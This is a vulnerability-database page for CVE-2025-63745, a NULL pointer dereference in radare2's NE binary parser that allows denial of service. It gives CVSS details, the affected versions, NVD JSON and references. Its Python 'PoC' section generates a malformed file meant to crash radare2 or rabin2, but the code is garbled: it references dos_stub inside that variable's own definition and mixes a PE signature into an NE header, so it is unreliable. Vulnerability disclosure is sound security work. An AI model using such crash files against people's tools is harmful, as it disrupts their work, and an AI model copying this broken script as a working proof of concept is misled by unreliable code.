Security Vulnerability Report
中文
CVE-2025-63745 CVSS 5.5 MEDIUM

CVE-2025-63745

Published: 2025-11-14 21:15:45
Last Modified: 2025-11-19 19:01:27
Source: [email protected]

Description

A NULL pointer dereference vulnerability was discovered in radare2 6.0.5 and earlier within the info() function of bin_ne.c. A crafted binary input can trigger a segmentation fault, leading to a denial of service when the tool processes malformed data.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:* - VULNERABLE
radare2 <= 6.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-63745 PoC - radare2 NULL Pointer Dereference in bin_ne.c This PoC generates a malformed NE (New Executable) format binary that triggers NULL pointer dereference in radare2's info() function. """ import struct def create_malformed_ne_binary(): """Generate a malformed NE format binary to trigger the vulnerability""" # DOS header ( MZ signature ) dos_header = bytearray(64) dos_header[0:2] = b'MZ' # DOS signature struct.pack_into('<H', dos_header, 60, 64) # e_lfanew at offset 60 # DOS stub dos_stub = b'This program cannot be run in DOS mode.\r\r\n$' + b'\x00' * (64 - len(dos_stub)) # PE signature pe_signature = b'PE\x00\x00' # NE header (malformed) ne_header = bytearray(64) # NE signature ne_header[0:2] = b'NE' # Linker major/minor version ne_header[2] = 0x06 # Major version ne_header[3] = 0x00 # Minor version # Entry table offset struct.pack_into('<H', ne_header, 0x0C, 0x10) # Entry table length struct.pack_into('<H', ne_header, 0x0E, 0x00) # File load CRC struct.pack_into('<I', ne_header, 0x10, 0x00000000) # Program flags ne_header[0x14] = 0x02 # Requires i386 # Additional header flags struct.pack_into('<H', ne_header, 0x15, 0x0000) # Auto data segment struct.pack_into('<H', ne_header, 0x1C, 0x0001) # Initial heap/Stack sizes struct.pack_into('<H', ne_header, 0x1E, 0x1000) struct.pack_into('<H', ne_header, 0x20, 0x1000) # Initial IP/CS values struct.pack_into('<H', ne_header, 0x22, 0x0000) struct.pack_into('<H', ne_header, 0x24, 0x0000) # Initial SP/SS values struct.pack_into('<H', ne_header, 0x26, 0x1000) struct.pack_into('<H', ne_header, 0x28, 0x0000) # Segment table offset/Count struct.pack_into('<H', ne_header, 0x2A, 0x40) # Offset that may cause issues struct.pack_into('<H', ne_header, 0x2C, 0xFFFF) # Malformed count # Resource table offset/Count struct.pack_into('<H', ne_header, 0x2E, 0x0000) struct.pack_into('<H', ne_header, 0x30, 0x0000) # Resident names table offset struct.pack_into('<H', ne_header, 0x32, 0x0000) # Module references table offset struct.pack_into('<H', ne_header, 0x34, 0x0000) # Imported names table offset struct.pack_into('<H', ne_header, 0x36, 0x0000) # Non-resident names table offset struct.pack_into('<I', ne_header, 0x38, 0x00000000) # Combine all parts malformed_binary = dos_header + dos_stub + pe_signature + ne_header return bytes(malformed_binary) if __name__ == '__main__': print('[+] Generating malformed NE binary for CVE-2025-63745') poc_data = create_malformed_ne_binary() output_file = 'CVE-2025-63745_poc.ne' with open(output_file, 'wb') as f: f.write(poc_data) print(f'[+] PoC file created: {output_file}') print('[+] To trigger the vulnerability, open this file with radare2:') print(f' $ r2 {output_file}') print('[+] Or use rabin2:') print(f' $ rabin2 -I {output_file}')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63745", "sourceIdentifier": "[email protected]", "published": "2025-11-14T21:15:45.083", "lastModified": "2025-11-19T19:01:27.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A NULL pointer dereference vulnerability was discovered in radare2 6.0.5 and earlier within the info() function of bin_ne.c. A crafted binary input can trigger a segmentation fault, leading to a denial of service when the tool processes malformed data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.5", "matchCriteriaId": "65F5C1BC-1B1F-4176-961D-C1811BE46456"}]}]}], "references": [{"url": "https://github.com/marlinkcyber/advisories/blob/main/advisories/MCSAID-2025-001-radare2-nullptr-deref-bin_ne.md", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/marlinkcyber/advisories/blob/main/advisories/radare2-nullptr-deref-bin_ne.md", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://github.com/radareorg/radare2/commit/6c5df3f8570d4f0c360681c08241ad8af3b919fd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/radareorg/radare2/issues/24660", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.